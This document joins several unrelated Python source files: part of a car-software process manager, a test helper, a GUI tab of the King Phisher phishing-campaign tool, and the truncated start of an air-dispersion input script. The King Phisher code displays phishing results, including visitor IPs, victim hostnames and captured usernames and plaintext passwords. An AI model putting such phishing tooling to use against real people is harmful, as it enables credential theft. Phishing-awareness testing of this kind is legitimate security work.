to end with SIGKILL instead of SIGTERM kill_processes = ['sensord', 'paramsd'] # processes to end if thermal conditions exceed Green parameters green_temp_processes = ['uploader'] persistent_processes = [ 'thermald', 'logmessaged', 'ui', 'uploader', ] if ANDROID: persistent_processes += [ 'logcatd', 'tombstoned', 'updated', ] car_started_processes = [ 'controlsd', 'plannerd', 'loggerd', 'radard', 'dmonitoringd', 'calibrationd', 'paramsd', 'camerad', 'modeld', 'proclogd', 'ubloxd', 'locationd', ] if WEBCAM: car_started_processes += [ 'dmonitoringmodeld', ] if ANDROID: car_started_processes += [ 'sensord', 'clocksd', 'gpsd', 'dmonitoringmodeld', 'deleter', ] def register_managed_process(name, desc, car_started=False): global managed_processes, car_started_processes, persistent_processes print("registering %s" % name) managed_processes[name] = desc if car_started: car_started_processes.append(name) else: persistent_processes.append(name) # ****************** process management functions ****************** def nativelauncher(pargs, cwd): # exec the process os.chdir(cwd) # because when extracted from pex zips permissions get lost -_- os.chmod(pargs[0], 0o700) os.execvp(pargs[0], pargs) def start_managed_process(name): if name in running or name not in managed_processes: return proc = managed_processes[name] if isinstance(proc, str): cloudlog.info("starting python %s" % proc) running[name] = Process(name=name, target=launcher, args=(proc,)) else: pdir, pargs = proc cwd = os.path.join(BASEDIR, pdir) cloudlog.info("starting process %s" % name) running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd)) running[name].start() def start_daemon_process(name): params = Params() proc, pid_param = daemon_processes[name] pid = params.get(pid_param, encoding='utf-8') if pid is not None: try: os.kill(int(pid), 0) with open(f'/proc/{pid}/cmdline') as f: if proc in f.read(): # daemon is running return except (OSError, FileNotFoundError): # process is dead pass cloudlog.info("starting daemon %s" % name) proc = subprocess.Popen(['python', '-m', proc], stdin=open('/dev/null', 'r'), stdout=open('/dev/null', 'w'), stderr=open('/dev/null', 'w'), preexec_fn=os.setpgrp) params.put(pid_param, str(proc.pid)) def prepare_managed_process(p): proc = managed_processes[p] if isinstance(proc, str): # import this python cloudlog.info("preimporting %s" % proc) importlib.import_module(proc) elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")): # build this process cloudlog.info("building %s" % (proc,)) try: subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0])) except subprocess.CalledProcessError: # make clean if the build failed cloudlog.warning("building %s failed, make clean" % (proc, )) subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0])) subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0])) def join_process(process, timeout): # Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382 # We have to poll the exitcode instead t = time.time() while time.time() - t < timeout and process.exitcode is None: time.sleep(0.001) def kill_managed_process(name): if name not in running or name not in managed_processes: return cloudlog.info("killing %s" % name) if running[name].exitcode is None: if name in interrupt_processes: os.kill(running[name].pid, signal.SIGINT) elif name in kill_processes: os.kill(running[name].pid, signal.SIGKILL) else: running[name].terminate() join_process(running[name], 5) if running[name].exitcode is None: if name in unkillable_processes: cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name) join_process(running[name], 15) if running[name].exitcode is None: cloudlog.critical("FORCE REBOOTING PHONE!") os.system("date >> /sdcard/unkillable_reboot") os.system("reboot") raise RuntimeError else: cloudlog.info("killing %s with SIGKILL" % name) os.kill(running[name].pid, signal.SIGKILL) running[name].join() cloudlog.info("%s is dead with %d" % (name, running[name].exitcode)) del running[name] def cleanup_all_processes(signal, frame): cloudlog.info("caught ctrl-c %s %s" % (signal, frame)) if ANDROID: pm_apply_packages('disable') for name in list(running.keys()): kill_managed_process(name) cloudlog.info("everything is dead") # ****************** run loop ****************** def manager_init(should_register=True): if should_register: reg_res = register() if reg_res: dongle_id = reg_res else: raise Exception("server registration failed") else: dongle_id = "c"*16 # set dongle id cloudlog.info("dongle id is " + dongle_id) os.environ['DONGLE_ID'] = dongle_id cloudlog.info("dirty is %d" % dirty) if not dirty: os.environ['CLEAN'] = '1' cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True) crash.bind_user(id=dongle_id) crash.bind_extra(version=version, dirty=dirty, is_eon=True) os.umask(0) try: os.mkdir(ROOT, 0o777) except OSError: pass # ensure shared libraries are readable by apks if ANDROID: os.chmod(BASEDIR, 0o755) os.chmod(os.path.join(BASEDIR, "cereal"), 0o755) os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755) def manager_thread(): # now loop thermal_sock = messaging.sub_sock('thermal') if os.getenv("GET_CPU_USAGE"): proc_sock = messaging.sub_sock('procLog', conflate=True) cloudlog.info("manager start") cloudlog.info({"environ": os.environ}) # save boot log subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd")) params = Params() # start daemon processes for p in daemon_processes: start_daemon_process(p) # start persistent processes for p in persistent_processes: start_managed_process(p) # start offroad if ANDROID: pm_apply_packages('enable') start_offroad() if os.getenv("NOBOARD") is None: start_managed_process("pandad") if os.getenv("BLOCK") is not None: for k in os.getenv("BLOCK").split(","): del managed_processes[k] logger_dead = False start_t = time.time() first_proc = None while 1: msg = messaging.recv_sock(thermal_sock, wait=True) # heavyweight batch processes are gated on favorable thermal conditions if msg.thermal.thermalStatus >= ThermalStatus.yellow: for p in green_temp_processes: if p in persistent_processes: kill_managed_process(p) else: for p in green_temp_processes: if p in persistent_processes: start_managed_process(p) if msg.thermal.freeSpace < 0.05: logger_dead = True if msg.thermal.started and "driverview" not in running: for p in car_started_processes: if p == "loggerd" and logger_dead: kill_managed_process(p) else: start_managed_process(p) else: logger_dead = False for p in reversed(car_started_processes): kill_managed_process(p) # this is ugly if "driverview" not in running and params.get("IsDriverViewEnabled") == b"1": start_managed_process("driverview") elif "driverview" in running and params.get("IsDriverViewEnabled") == b"0": kill_managed_process("driverview") # check the status of all processes, did any of them die? running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running] cloudlog.debug(' '.join(running_list)) # Exit main loop when uninstall is needed if params.get("DoUninstall", encoding='utf8') == "1": break if os.getenv("GET_CPU_USAGE"): dt = time.time() - start_t # Get first sample if dt > 30 and first_proc is None: first_proc = messaging.recv_sock(proc_sock) # Get last sample and exit if dt > 90: last_proc = messaging.recv_sock(proc_sock, wait=True) cleanup_all_processes(None, None) sys.exit(print_cpu_usage(first_proc, last_proc)) def manager_prepare(spinner=None): # build all processes os.chdir(os.path.dirname(os.path.abspath(__file__))) # Spinner has to start from 70 here total = 100.0 if prebuilt else 30.0 for i, p in enumerate(managed_processes): if spinner is not None: spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),)) prepare_managed_process(p) def uninstall(): cloudlog.warning("uninstalling") with open('/cache/recovery/command', 'w') as f: f.write('--wipe_data\n') # IPowerManager.reboot(confirm=false, reason="recovery", wait=true) android.reboot(reason="recovery") def main(): os.environ['PARAMS_PATH'] = PARAMS # the flippening! os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1') # disable bluetooth os.system('service call bluetooth_manager 8') params = Params() params.manager_start() default_params = [ ("CommunityFeaturesToggle", "0"), ("CompletedTrainingVersion", "0"), ("IsRHD", "0"), ("IsMetric", "0"), ("RecordFront", "0"), ("HasAcceptedTerms", "0"), ("HasCompletedSetup", "0"), ("IsUploadRawEnabled", "1"), ("IsLdwEnabled", "1"), ("IsGeofenceEnabled", "-1"), ("SpeedLimitOffset", "0"), ("LongitudinalControl", "0"), ("LimitSetSpeed", "0"), ("LimitSetSpeedNeural", "0"), ("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')), ("OpenpilotEnabledToggle", "1"), ("LaneChangeEnabled", "1"), ("IsDriverViewEnabled", "0"), ] # set unset params for k, v in default_params: if params.get(k) is None: params.put(k, v) # is this chffrplus? if os.getenv("PASSIVE") is not None: params.put("Passive", str(int(os.getenv("PASSIVE")))) if params.get("Passive") is None: raise Exception("Passive must be set to continue") if ANDROID: update_apks() manager_init() manager_prepare(spinner) spinner.close() if os.getenv("PREPAREONLY") is not None: return # SystemExit on sigterm signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1)) try: manager_thread() except SystemExit: raise except Exception: traceback.print_exc() crash.capture_exception() finally: cleanup_all_processes(None, None) if params.get("DoUninstall", encoding='utf8') == "1": uninstall() if __name__ == "__main__": try: main() except Exception: add_logentries_handler(cloudlog) cloudlog.exception("Manager failed to start") # Show last 3 lines of traceback error = traceback.format_exc(3) error = "Manager failed to start\n \n" + error with TextWindow(error) as t: t.wait_for_exit() raise # manual exit because we are forked sys.exit(0)
base.py
import sys from subprocess import PIPE, Popen, STDOUT from threading import Thread import os.path import tempfile from Queue import Queue, Empty ON_POSIX = 'posix' in sys.builtin_module_names __all__ = [ "read_until", "AirpnpProcess", ] def enqueue_output(out, queue): for line in iter(out.readline, ''): queue.put(line) out.close() def millis(): import time as time_ #make sure we don't override time return int(round(time_.time() * 1000)) def read_until(q, pattern, timeout=1000): import re start = millis() lines = [] pat = re.compile(pattern) found = False while millis() - start < timeout: try: line = q.get(timeout=.2) lines.append(line) if pat.match(line): found = True break except Empty: pass return (found, lines) class AirpnpProcess(object): def __init__(self, config={}): self.config = config def create_config(self, config): f = tempfile.NamedTemporaryFile(delete=True) f.write("[airpnp]\n") for k, v in config.items(): f.write("%s=%s\n" % (k, v)) f.flush() return f.name def __enter__(self): configfn = self.create_config(self.config) args = ["twistd", "-n", "airpnp", "-c", configfn] cwd = os.path.join(os.path.dirname(__file__), "..") self.proc = Popen(args, stdout=PIPE, stderr=STDOUT, cwd=cwd, close_fds=ON_POSIX, bufsize=1) q = Queue() t = Thread(target=enqueue_output, args=(self.proc.stdout, q)) t.daemon = True t.start() return q def __exit__(self, type, value, tb): self.proc.kill()
campaign.py
#!/usr/bin/env python # -*- coding: utf-8 -*- # # king_phisher/client/tabs/campaign.py # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of the project nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # import datetime import logging import threading import time from king_phisher import find from king_phisher import ipaddress from king_phisher import utilities from king_phisher.client import export from king_phisher.client import graphs from king_phisher.client import gui_utilities from king_phisher.client.widget import extras from king_phisher.client.widget import managers from boltons import iterutils from gi.repository import GdkPixbuf from gi.repository import GLib from gi.repository import Gtk from smoke_zephyr.utilities import parse_timespan UNKNOWN_LOCATION_STRING = 'N/A (Unknown)' class CampaignViewGenericTab(gui_utilities.GladeGObject): """ This object is meant to be subclassed by all of the tabs which load and display information about the current campaign. """ label_text = 'Unknown' """The label of the tab for display in the GUI.""" top_gobject = 'box' def __init__(self, *args, **kwargs): super(CampaignViewGenericTab, self).__init__(*args, **kwargs) self.label = Gtk.Label(label=self.label_text) """The :py:class:`Gtk.Label` representing this tab with text from :py:attr:`~.CampaignViewGenericTab.label_text`.""" self.is_destroyed = threading.Event() getattr(self, self.top_gobject).connect('destroy', self.signal_destroy) self.last_load_time = float('-inf') """The last time the data was loaded from the server.""" self.refresh_frequency = parse_timespan(str(self.config.get('gui.refresh_frequency', '5m'))) """The lifetime in seconds to wait before refreshing the data from the server.""" self.loader_thread = None """The thread object which loads the data from the server.""" self.loader_thread_lock = threading.Lock() """The :py:class:`threading.Lock` object used for synchronization between the loader and main threads.""" self.loader_thread_stop = threading.Event() """The :py:class:`threading.Event` object used to request that the loader thread stop before completion.""" self.application.connect('campaign-set', self.signal_kpc_campaign_set) def _sync_loader_thread(self): """ Synchronize the loader thread by ensuring that it is stopped. If it is currently running, this will use :py:attr:`~.loader_thread_stop` to request that the loader stops early. """ if not self.loader_thread_is_running: return # it's alive so tell it to stop, wait for it, then proceed self.loader_thread_stop.set() while self.loader_thread.is_alive(): gui_utilities.gtk_sync() self.loader_thread.join(1) @property def rpc(self): return self.application.rpc @property def loader_thread_is_running(self): if self.loader_thread is None: return False return self.loader_thread.is_alive() def load_campaign_information(self, force=True): raise NotImplementedError() def signal_button_clicked_refresh(self, button): self.load_campaign_information() def signal_destroy(self, gobject): self.is_destroyed.set() self.loader_thread_stop.set() if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive(): self.logger.debug("waiting on thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident)) while self.loader_thread.is_alive(): gui_utilities.gtk_sync() self.logger.debug("joined thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident)) def signal_kpc_campaign_set(self, kpc, cid): self.load_campaign_information() class CampaignViewGenericTableTab(CampaignViewGenericTab): """ This object is meant to be subclassed by tabs which will display campaign information of different types from specific database tables. The data in this object is refreshed when multiple events occur and it uses an internal timer to represent the last time the data was refreshed. """ dependencies = gui_utilities.GladeDependencies( children=( 'button_refresh', 'treeview_campaign' ) ) remote_table_name = '' """The database table represented by this tab.""" view_columns = () """The dictionary map of column numbers to column names starting at column 1.""" def __init__(self, *args, **kwargs): super(CampaignViewGenericTableTab, self).__init__(*args, **kwargs) treeview = self.gobjects['treeview_campaign'] self.treeview_manager = managers.TreeViewManager( treeview, selection_mode=Gtk.SelectionMode.MULTIPLE, cb_delete=self._prompt_to_delete_row, cb_refresh=self.load_campaign_information ) self.treeview_manager.set_column_titles(self.view_columns, column_offset=1) self.popup_menu = self.treeview_manager.get_popup_menu() """The :py:class:`Gtk.Menu` object which is displayed when right-clicking in the view area.""" treeview = self.gobjects['treeview_campaign'] store_columns = [str] * (len(self.view_columns) + 1) store = Gtk.ListStore(*store_columns) treeview.set_model(store) def _prompt_to_delete_row(self, treeview, _): if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive(): gui_utilities.show_dialog_warning('Can Not Delete Rows While Loading', self.parent) return model = treeview.get_model() row_ids = [model.get_value(ti, 0) for ti in gui_utilities.gtk_treeview_selection_iterate(treeview)] if len(row_ids) == 0: return elif len(row_ids) == 1: message = 'Delete This Row?' else: message = "Delete These {0:,} Rows?".format(len(row_ids)) if not gui_utilities.show_dialog_yes_no(message, self.parent, 'This information will be lost.'): return self.application.emit(self.remote_table_name[:-1] + '-delete', row_ids) self.load_campaign_information() def format_row_data(self, row): """ This method is overridden by subclasses to format the raw row data returned from the server. The length of the list must equal the number of columns in the table. This method is called for each row in the remote table by the loader thread. :return: The formated row data. :rtype: list """ raise NotImplementedError() def format_cell_data(self, cell_data): """ This method provides formatting to the individual cell values returned from the :py:meth:`.format_row_data` function. Values are converted into a format suitable for reading. :param cell: The value to format. :return: The formatted cell value. :rtype: str """ if isinstance(cell_data, datetime.datetime): cell_data = utilities.datetime_utc_to_local(cell_data) return utilities.format_datetime(cell_data) elif cell_data is None: return '' return str(cell_data) def load_campaign_information(self, force=True): """ Load the necessary campaign information from the remote server. Unless *force* is True, the :py:attr:`~.CampaignViewGenericTab.last_load_time` is compared with the :py:attr:`~.CampaignViewGenericTab.refresh_frequency` to check if the information is stale. If the local data is not stale, this function will return without updating the table. :param bool force: Ignore the load life time and force loading the remote data. """ if not force and ((time.time() - self.last_load_time) < self.refresh_frequency): return self.loader_thread_lock.acquire() self._sync_loader_thread() self.loader_thread_stop.clear() store = self.gobjects['treeview_campaign'].get_model() store.clear() self.loader_thread = threading.Thread(target=self.loader_thread_routine, args=(store,)) self.loader_thread.daemon = True self.loader_thread.start() self.loader_thread_lock.release() return def loader_thread_routine(self, store): """ The loading routine to be executed within a thread. :param store: The store object to place the new data. :type store: :py:class:`Gtk.ListStore` """ gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', False)) for row in self.rpc.remote_table(self.remote_table_name, query_filter={'campaign_id': self.config['campaign_id']}): if self.loader_thread_stop.is_set(): break if self.is_destroyed.is_set(): break if self.rpc is None: break row_data = self.format_row_data(row) if row_data is None: self.rpc('db/table/delete', self.remote_table_name, row.id) continue row_data = list(map(self.format_cell_data, row_data)) row_data.insert(0, str(row.id)) gui_utilities.glib_idle_add_wait(store.append, row_data) if self.is_destroyed.is_set(): return gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', True)) self.last_load_time = time.time() def signal_button_clicked_export(self, button): self.export_table_to_csv() def export_table_to_csv(self): """Export the data represented by the view to a CSV file.""" if not self.loader_thread_lock.acquire(False) or (isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive()): gui_utilities.show_dialog_warning('Can Not Export Rows While Loading', self.parent) return dialog = extras.FileChooserDialog('Export Data', self.parent) file_name = self.config['campaign_name'] + '.csv' response = dialog.run_quick_save(file_name) dialog.destroy() if not response: self.loader_thread_lock.release() return destination_file = response['target_path'] store = self.gobjects['treeview_campaign'].get_model() columns = dict(enumerate(('UID',) + self.view_columns)) export.liststore_to_csv(store, destination_file, columns) self.loader_thread_lock.release() def export_table_to_xlsx_worksheet(self, worksheet, title_format): """ Export the data represented by the view to an XLSX worksheet. :param worksheet: The destination sheet for the store's data. :type worksheet: :py:class:`xlsxwriter.worksheet.Worksheet` :param title_format: The formatting to use for the title row. :type title_format: :py:class:`xlsxwriter.format.Format` """ if not self.loader_thread_lock.acquire(False) or (isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive()): gui_utilities.show_dialog_warning('Can Not Export Rows While Loading', self.parent) return store = self.gobjects['treeview_campaign'].get_model() columns = dict(enumerate(('UID',) + self.view_columns)) export.liststore_to_xlsx_worksheet(store, worksheet, columns, title_format) self.loader_thread_lock.release() class CampaignViewDeaddropTab(CampaignViewGenericTableTab): """Display campaign information regarding dead drop connections.""" remote_table_name = 'deaddrop_connections' label_text = 'Deaddrop' view_columns = ( 'Destination', 'Visit Count', 'IP Address', 'Username', 'Hostname', 'Local IP Addresses', 'First Hit', 'Last Hit' ) def format_row_data(self, connection): deploy_details = self.rpc.remote_table_row('deaddrop_deployments', connection.deployment_id, cache=True) if not deploy_details: return None row = ( deploy_details.destination, connection.visit_count, connection.visitor_ip, connection.local_username, connection.local_hostname, connection.local_ip_addresses, connection.first_visit, connection.last_visit ) return row class CampaignViewCredentialsTab(CampaignViewGenericTableTab): """Display campaign information regarding submitted credentials.""" remote_table_name = 'credentials' label_text = 'Credentials' view_columns = ( 'Email Address', 'Username', 'Password', 'Submitted' ) def __init__(self, *args, **kwargs): super(CampaignViewCredentialsTab, self).__init__(*args, **kwargs) treeview = self.gobjects['treeview_campaign'] pwd_column_id = self.view_columns.index('Password') treeview.get_column(pwd_column_id).set_property('visible', False) def format_row_data(self, credential): msg_details = self.rpc.remote_table_row('messages', credential.message_id, cache=True) if not msg_details: return None row = ( msg_details.target_email, credential.username, credential.password, credential.submitted ) return row def signal_button_toggled_show_passwords(self, button): treeview = self.gobjects['treeview_campaign'] pwd_column_id = self.view_columns.index('Password') treeview.get_column(pwd_column_id).set_property('visible', button.get_property('active')) class CampaignViewDashboardTab(CampaignViewGenericTab): """Display campaign information on a graphical dash board.""" dependencies = gui_utilities.GladeDependencies( children=( 'box_top_left', 'box_top_right', 'box_bottom', 'scrolledwindow_top_left', 'scrolledwindow_top_right', 'scrolledwindow_bottom' ) ) label_text = 'Dashboard' """The tabs label for display in the GUI.""" def __init__(self, *args, **kwargs): super(CampaignViewDashboardTab, self).__init__(*args, **kwargs) self.graphs = [] """The :py:class:`.CampaignGraph` classes represented on the dash board.""" dash_ports = { # dashboard position, (width, height) 'top_left': (380, 200), 'top_right': (380, 200), 'bottom': (760, 200) } for dash_port, details in dash_ports.items(): graph_name = self.config['dashboard.' + dash_port] cls = graphs.get_graph(graph_name) if not cls: self.logger.warning('could not get graph: ' + graph_name) logo_file_path = find.find_data_file('king-phisher-icon.svg') if logo_file_path: image = Gtk.Image.new_from_pixbuf(GdkPixbuf.Pixbuf.new_from_file_at_size(logo_file_path, 128, 128)) image.show() self.gobjects['scrolledwindow_' + dash_port].add(image) continue graph_inst = cls(self.application, details, getattr(self, self.top_gobject).get_style_context()) self.gobjects['scrolledwindow_' + dash_port].add(graph_inst.canvas) self.gobjects['box_' + dash_port].pack_end(graph_inst.navigation_toolbar, False, False, 0) self.graphs.append(graph_inst) self.logger.debug("dashboard refresh frequency set to {0} seconds".format(self.refresh_frequency)) GLib.timeout_add_seconds(self.refresh_frequency, self.loader_idle_routine) def load_campaign_information(self, force=True): """ Load the necessary campaign information from the remote server. Unless *force* is True, the :py:attr:`~.last_load_time` is compared with the :py:attr:`~.refresh_frequency` to check if the information is stale. If the local data is not stale, this function will return without updating the table. :param bool force: Ignore the load life time and force loading the remote data. """ if not force and ((time.time() - self.last_load_time) < self.refresh_frequency): return if not self.application.rpc: self.logger.warning('skipping load_campaign_information because rpc is not initialized') return with self.loader_thread_lock: self._sync_loader_thread() self.loader_thread_stop.clear() self.loader_thread = threading.Thread(target=self.loader_thread_routine) self.loader_thread.daemon = True self.loader_thread.start() def loader_idle_routine(self): """The routine which refreshes the campaign data at a regular interval.""" if self.rpc and not self.loader_thread_is_running: self.logger.debug('idle loader routine called') self.load_campaign_information() return True def loader_thread_routine(self): """The loading routine to be executed within a thread.""" if not 'campaign_id' in self.config: return if not self.rpc.remote_table_row('campaigns', self.config['campaign_id']): return info_cache = {} for graph in self.graphs: if self.loader_thread_stop.is_set(): break if self.is_destroyed.is_set(): break info_cache.update(gui_utilities.glib_idle_add_wait(lambda g=graph: g.refresh(info_cache, self.loader_thread_stop))) else: self.last_load_time = time.time() class CampaignViewVisitsTab(CampaignViewGenericTableTab): """Display campaign information regarding incoming visitors.""" remote_table_name = 'visits' label_text = 'Visits' view_columns = ( 'Email Address', 'IP Address', 'Visit Count', 'Visitor User Agent', 'Visitor Location', 'First Visit', 'Last Visit' ) def __init__(self, *args, **kwargs): super(CampaignViewVisitsTab, self).__init__(*args, **kwargs) self._ips_for_georesolution = {} def format_row_data(self, visit): msg_details = self.rpc.remote_table_row('messages', visit.message_id, cache=True) if not msg_details: return None visitor_ip = ipaddress.ip_address(visit.visitor_ip) geo_location = UNKNOWN_LOCATION_STRING if visitor_ip.is_loopback: geo_location = 'N/A (Loopback)' elif visitor_ip.is_private: geo_location = 'N/A (Private)' elif isinstance(visitor_ip, ipaddress.IPv6Address): geo_location = 'N/A (IPv6 Address)' else: if not visitor_ip in self._ips_for_georesolution: self._ips_for_georesolution[visitor_ip] = visit.first_visit elif self._ips_for_georesolution[visitor_ip] > visit.first_visit: self._ips_for_georesolution[visitor_ip] = visit.first_visit row = ( msg_details.target_email, str(visitor_ip), visit.visit_count, visit.visitor_details, geo_location, visit.first_visit, visit.last_visit ) return row def loader_thread_routine(self, store): self._ips_for_georesolution = {} super(CampaignViewVisitsTab, self).loader_thread_routine(store) ips_for_geores = [ip for (ip, _) in sorted(self._ips_for_georesolution.items(), key=lambda x: x[1])] locations = {} for ip_addresses in iterutils.chunked(ips_for_geores, 50): locations.update(self.rpc.geoip_lookup_multi(ip_addresses)) for row in store: if row[2] in locations: row[5] = str(locations[row[2]]) class CampaignViewMessagesTab(CampaignViewGenericTableTab): """Display campaign information regarding sent messages.""" remote_table_name = 'messages' label_text = 'Messages' view_columns = ( 'Email Address', 'Sent', 'Trained', 'Department', 'Opened', 'Opener IP Address', 'Opener User Agent' ) def format_row_data(self, message): department = message.company_department if department: department = department.name row = ( message.target_email, message.sent, ('Yes' if message.trained else ''), department, message.opened, message.opener_ip, message.opener_user_agent ) return row class CampaignViewTab(object): """ The King Phisher client top-level 'View Campaign' tab. This object manages the sub-tabs which display all the information regarding the current campaign. """ def __init__(self, parent, application): """ :param parent: The parent window for this object. :type parent: :py:class:`Gtk.Window` :param application: The main client application instance. :type application: :py:class:`Gtk.Application` """ self.parent = parent self.application = application self.config = application.config self.logger = logging.getLogger('KingPhisher.Client.' + self.__class__.__name__) self.box = Gtk.Box() self.box.set_property('orientation', Gtk.Orientation.VERTICAL) self.box.show() self.label = Gtk.Label(label='View Campaign') """The :py:class:`Gtk.Label` representing this tabs name.""" self.notebook = Gtk.Notebook() """ The :py:class:`Gtk.Notebook` for holding sub-tabs.""" self.notebook.connect('switch-page', self.signal_notebook_switch_page) self.notebook.set_scrollable(True) self.box.pack_start(self.notebook, True, True, 0) self.tabs = utilities.FreezableDict() """A dict object holding the sub tabs managed by this object.""" current_page = self.notebook.get_current_page() self.last_page_id = current_page if graphs.has_matplotlib: self.logger.info('matplotlib is installed, dashboard will be available') dashboard_tab = CampaignViewDashboardTab(application) self.tabs['dashboard'] = dashboard_tab self.notebook.append_page(dashboard_tab.box, dashboard_tab.label) else: self.logger.warning('matplotlib is not installed, dashboard will not be available') messages_tab = CampaignViewMessagesTab(application) self.tabs['messages'] = messages_tab self.notebook.append_page(messages_tab.box, messages_tab.label) visits_tab = CampaignViewVisitsTab(application) self.tabs['visits'] = visits_tab self.notebook.append_page(visits_tab.box, visits_tab.label) credentials_tab = CampaignViewCredentialsTab(application) self.tabs['credentials'] = credentials_tab self.notebook.append_page(credentials_tab.box, credentials_tab.label) if self.config.get('gui.show_deaddrop', False): deaddrop_connections_tab = CampaignViewDeaddropTab(application) self.tabs['deaddrop_connections'] = deaddrop_connections_tab self.notebook.append_page(deaddrop_connections_tab.box, deaddrop_connections_tab.label) self.tabs.freeze() for tab in self.tabs.values(): tab.box.show() self.notebook.show() def signal_notebook_switch_page(self, notebook, current_page, index): if not hasattr(self.parent, 'rpc'): return #previous_page = notebook.get_nth_page(self.last_page_id) self.last_page_id = index for tab in self.tabs.values(): if current_page != tab.box: continue if hasattr(tab, 'load_campaign_information'): tab.load_campaign_information(force=False)
aermodInput.py
#!/usr/bin/env python3 import pandas as pd import geopandas as gpd import networkx as nx from shapely.geometry import Point,LineString from shapely.wkt import loads from shapely.strtree import STRtree import math import argparse import multiprocessing as mp from itertools import chain import hashlib import os from aermodConst import * home = os.path.dirname(__file__) aermodTemplate = open(os.path.join(home,'AERMOD_input_template.txt')).read() # functions for parallel receptor checking output = mp.SimpleQueue() def checkReceptorGroup(tree,data): indices = [] for idx,row in data.iterrows(): if tree.nearest(row.location).contains(row.location): print('Dropping',row.receptorID) indices.append(idx) output.put(indices) def checkAllReceptors(tree,receptors,numGroups = None): numReceptors = receptors.index.size if numGroups is None: numGroups = mp.cpu_count() groupSize = 1 + int(numReceptors/numGroups) args = [] for start in range(0,numReceptors,groupSize): if start >= numReceptors: break stop = start + groupSize if stop > numReceptors: stop = numReceptors args.append((tree,receptors.iloc[range(start,stop)])) procs = [mp.Process(target = checkReceptorGroup,args = arg) for arg in args] for p in procs: p.start() for p in procs: if p.is_alive(): print('Joining',p.name) p.join(timeout = 10) indices = [output.get() for p in procs] return list(chain(*indices)) class AermodScenario(object): def __init__(self,epsg,laneWidth): self.pollutantID = 110 self.pollutant = 'PM25 H1H' self.epsg = 3665 if epsg is None else epsg self.laneWidth = 3.6576 if laneWidth is None else laneWidth*feet2meters # init dataframes self.lineSources = pd.DataFrame( columns = ['sourceID','x1','y1','x2','y2','flux','width','geometry','buffers'] ) def getLinkGeometries(self,linksPath): # read the links self.scenarioGDF = gpd.read_file(linksPath) # project self.scenarioGDF = self.scenarioGDF.to_crs(epsg = self.epsg) # define the study area self.studyArea = self.scenarioGDF.unary_union.convex_hull.buffer(receptorSpacing) def constructNetwork(self): # add the links to a DiGraph() object for easier retrieval self.network = nx.DiGraph() for idx,row in self.scenarioGDF.iterrows(): self.network.add_edge( row.A_NODE,row.B_NODE, geometry = row.geometry, width = row['#LANES']*self.laneWidth ) def mergeEmissionRate(self,emissionsPath): # read the total_emissions.csv from S3 and add the g/(s*m^2) # emissionFlux for each link emissions = pd.read_csv(emissionsPath) # filter on and pollutant emissions = emissions.query(f'pollutantID == {self.pollutantID}') # aggregate to link emissions = emissions.groupby('linkID').emquant.sum().reset_index() # iterate and add the emission flux to every link for idx,row in emissions.iterrows(): a,b = map(int,row['linkID'].split('-')) link = self.network[a][b] area = link['geometry'].length*link['width'] link['flux'] = row['emquant']/(area*secondsInDay) def makeSources(self): # for every link that has non-zero emissions, decompose it # into straight line segments, assign these segments new IDs # and save them in a dataframe numLinks = len(self.network.edges) rows = [] for a,b,link in self.network.edges(data = True): flux = link.get('flux') if not flux: continue points = [Point(p) for p in link['geometry'].coords] for index in range(len(points) - 1): sourceID = f'{a}_{b}_{index}' start = points[index] end = points[index + 1] # discard very short (< 1 meter) segments if start.distance(end) < 1: continue geom = LineString((start,end)) # print('Adding source',sourceID) rows.append({ 'sourceID':sourceID, 'x1':start.x,'y1':start.y, 'x2':end.x,'y2':end.y, 